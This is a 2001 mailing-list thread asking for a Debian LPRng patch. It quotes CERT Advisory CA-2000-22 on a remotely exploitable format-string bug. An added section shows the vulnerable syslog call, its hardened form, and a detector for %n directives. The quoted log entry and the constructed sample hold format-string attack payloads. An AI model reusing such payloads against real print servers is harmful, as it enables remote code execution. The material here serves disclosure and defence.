lprng

2001-01-10 Thread V. Achiaga



Does anyone know where I can find a Debian-specific patch for the
lprng package?

Thanks in advance.

Why? Just read the following...

 Subject: CERT Advisory CA-2000-22
 
 
 CERT Advisory CA-2000-22 Input Validation Problems in LPRng
 
Original release date: December 12, 2000
Last updated: --
Source: CERT/CC
 
A complete revision history is at the end of this file.
 
 Systems Affected
 
  * Systems running unpatched LPRng software
 
 Overview
 
A popular replacement software package to the BSD lpd printing service
called LPRng contains at least one software defect, known as a "format
string vulnerability,"[1] which may allow remote users to execute
arbitrary code on vulnerable systems.
 
 I. Description
 
LPRng, now being packaged in several open-source operating system
distributions, has a missing format string argument in at least two
calls to the syslog() function.
 
Missing format strings in function calls allow user-supplied arguments
to be passed to a susceptible *snprintf() function call. Remote users
with access to the printer port (port 515/tcp) may be able to pass
format-string parameters that can overwrite arbitrary addresses in the
printing service's address space. Such overwriting can cause
segmentation violations leading to denial of printing services or to
the execution of arbitrary code injected through other means into the
memory segments of the printer service.
 
Sample syslog entries from successful exploitation of this
vulnerability have been reported, as follows:
 
 Nov 26 10:01:00 foo SERVER[12345]: Dispatch_input: bad request line
 'BB{E8}{F3}{FF}{BF}{E9}{F3}{FF}{BF}{EA}{F3}{FF}{BF}{EB}{F3}{FF}{BF}
 XX%.168u%300$nsecurity.%301 $nsecurity%302$n%.192u%303$n
 
This vulnerability has been assigned the identifier CAN-2000-0917 by
the Common Vulnerabilities and Exposures (CVE) group:
 
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917
 
The CERT/CC has received reports of extensive probing to port 515/tcp.
In addition, we have received some reports of systems compromised
using this vulnerability. Tools exploiting this vulnerability have
been posted to public forums.
 
 II. Impact
 
A remote user may be able to execute arbitrary code with elevated
privileges.
 
In addition, the printing service may be disrupted or disabled
entirely.
 
 III. Solution
 
 Apply a patch from your vendor
 
Upgrade to a non-vulnerable version of LPRng (3.6.25), as described in
the vendor sections below. Alternately, you can obtain the version of
LPRng which fixes the missing format string at:
 
   ftp://ftp.astart.com/pub/LPRng/LPRng/LPRng-3.6.25.tgz
 
 Disallow access to printer service ports (typically 515/tcp) using firewall
 or packet-filtering technologies
 
Blocking access to the vulnerable service will limit your exposure to
attacks from outside your network perimeter. However, the
vulnerability would still allow local users to gain privileges they
normally shouldn't have; in addition, blocking port 515/tcp at a
network perimeter would still allow any remote user inside the
perimeter to exploit the vulnerability.
 
 Appendix A. Vendor Information
 
 Apple
 
Apple has conducted an investigation and determined that Mac OS X
Public Beta and Mac OS X Server do not use LPRng and are therefore not
vulnerable to this exploitation.
 
 Caldera OpenLinux
 
See CSSA-2000-033.0 "format bug in LPRng" at:
 
   http://www.calderasystems.com/support/security/advisories/CSSA-2000-033.0.txt
 
 Compaq Computer 
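
Added example (not part of the original message or the CERT advisory, and not LPRng's own code): the bug class the advisory describes, client text reaching syslog() as the format, next to the hardened call, plus a triage check that flags logged "bad request line" entries containing memory-writing `%n` directives. The helper names and the sample log lines are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Bug class from the advisory, shown as a comment only:
 *     syslog(LOG_ERR, msg);     <- client-controlled text used as the format
 * Hardened call: the format is a constant, the untrusted text is an argument.
 * snprintf stands in for syslog's formatter so the result can be inspected. */
int format_bad_request(char *out, size_t outlen, const char *request_line)
{
    return snprintf(out, outlen, "Dispatch_input: bad request line '%s'",
                    request_line);
}

void log_bad_request(const char *request_line)   /* hypothetical helper */
{
    char buf[512];
    format_bad_request(buf, sizeof buf, request_line);
    syslog(LOG_ERR, "%s", buf);                  /* never syslog(LOG_ERR, buf) */
}

/* Count conversions that store to memory (%n, %hn, %300$n, ...). */
int count_write_directives(const char *s)
{
    int hits = 0;
    while ((s = strchr(s, '%')) != NULL) {
        s++;                                  /* step past '%' */
        if (*s == '%') { s++; continue; }     /* "%%" is a literal percent */
        s += strspn(s, "0123456789$.-+ #*");  /* position, flags, width, precision */
        s += strspn(s, "hlLqjzt");            /* length modifiers */
        if (*s == 'n')
            hits++;
    }
    return hits;
}

/* Triage rule for one syslog line: a logged bad request that carries
 * at least one memory-writing directive. Returns 1 if it matches. */
int is_suspicious_lpd_entry(const char *logline)
{
    const char *req = strstr(logline, "bad request line");
    return req != NULL && count_write_directives(req) > 0;
}

int main(void)
{
    /* Constructed sample lines, not taken from a real system */
    const char *lines[] = {
        "Jan 10 09:00:01 host SERVER[101]: Dispatch_input: bad request line 'lp 100%% full'",
        "Jan 10 09:00:02 host SERVER[102]: Dispatch_input: bad request line 'AA%.40u%7$nBB%8$hn'",
    };
    for (size_t i = 0; i < 2; i++)
        printf("%d  %s\n", is_suspicious_lpd_entry(lines[i]), lines[i]);
    return 0;
}
```

A match shows that a request carried format-string write directives; whether it had any effect depends on whether the daemon logging it was already patched.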

Re: lprng

2001-01-10 Thread Ron Rademaker

I know there's a Debian package of lprng, but I don't know if the patch
you're talking about is applied to this package. I guess you should check
the changelog to find out.

Ron Rademaker

